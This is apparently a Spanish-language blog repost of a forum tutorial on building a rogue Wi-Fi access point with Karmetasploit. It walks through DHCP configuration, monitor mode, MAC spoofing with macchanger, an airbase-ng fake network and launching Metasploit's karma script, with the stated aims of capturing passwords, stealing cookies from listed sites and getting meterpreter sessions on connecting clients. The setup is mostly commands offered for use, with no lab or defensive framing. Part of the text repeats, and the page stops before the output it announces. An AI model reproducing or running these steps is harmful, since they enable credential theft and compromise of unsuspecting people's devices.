Seguridad Wireless
Karmetasploit sirve para crear puntos de acceso falsos, capturar
contraseñas, recopilar infomación, y llevar a los ataques de navegador
contralos clientes.
Cuando un usuario se conecta a nuestro AP Fake, la dirección IP la estará asignando el servicio DHCP, y posteriormente karmetasploit intentará ejecutar todos los exploits sobre la maquina objetivo en busca de alguna vulnerabilidad e intentará conseguir una sesión meterpreter.
Descargamos Karmetasploit
Instalamos dhcpd3-server
Este post fue hecho por Stuxnet en el foro. Para dudas o consultas, sobre este tema, hacé click aca.
Crear access points falsos con Karmetasploit
Cuando un usuario se conecta a nuestro AP Fake, la dirección IP la estará asignando el servicio DHCP, y posteriormente karmetasploit intentará ejecutar todos los exploits sobre la maquina objetivo en busca de alguna vulnerabilidad e intentará conseguir una sesión meterpreter.
Descargamos Karmetasploit
Instalamos dhcpd3-server
sudo apt-get install isc-dhcp-serverUna ves instalado procederemos a configurarlo, Quedando de la siguiente manera.
# # Sample configuration file for ISC dhcpd for Debian # # Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as # configuration file instead of this file. # # # The ddns-updates-style parameter controls whether or not the server will # attempt to do a DNS update when a lease is confirmed. We default to the # behavior of the version 2 packages ('none', since DHCP v2 didn't # have support for DDNS.) ddns-update-style none; # option definitions common to all supported networks... option domain-name "10.0.0.1"; option domain-name-servers 10.0.0.1; default-lease-time 60; max-lease-time 72; # If this DHCP server is the official DHCP server for the local # network, the authoritative directive should be uncommented. #authoritative; # Use this to send dhcp log messages to a different log file (you also # have to hack syslog.conf to complete the redirection). log-facility local7; # No service will be given on this subnet, but declaring it helps the # DHCP server to understand the network topology. #subnet 10.0.0.0 netmask 255.255.255.0 { #} # This is a very basic subnet declaration. #subnet 10.0.0.0 netmask 255.255.255.0 { # range 10.0.0.100 10.0.0.254; # option routers 10.0.0.1; #}Luego procedemos a editar /opt/backbox/msf/data/exploits/capture/http/sites.txt donde están almacenados todos los sitios en los que metasploit intentará robar cookies. Ahora comenzamos poniendo nuestra tarjeta en modo monitor, en mi caso es la wlan0
airmon-ng start wlan0Se activará asà la interfaz mon0 la cual podemos cambiarle la dirección MAC si lo creemos necesario:
ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 upUna vez que la interfaz está lista ya podemos crear nuestro punto de acceso con la ayuda de airbase-ng, tecleemos lo siguiente en la consola:
airbase-ng -P -C 30 -c 6 -e “red_falsa” mon0Donde mon0 es nuestra tarjeta en modo monitor y “red_falsa” es el nombre que queramos darle a nuestra red. Este paso anterior nos creará una nueva interfaz llamada at0 a la cual vamos a darle una ip y activamos el servidor dhcp desde otra terminal:
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 dhcpd -cf /etc/dhcp/dhcpd.conf at0Ahora iniciamos mestasploit con karma.
msfconsole -r karma.rcAl iniciar karmetasploit les aparecerá:
0 comentarios: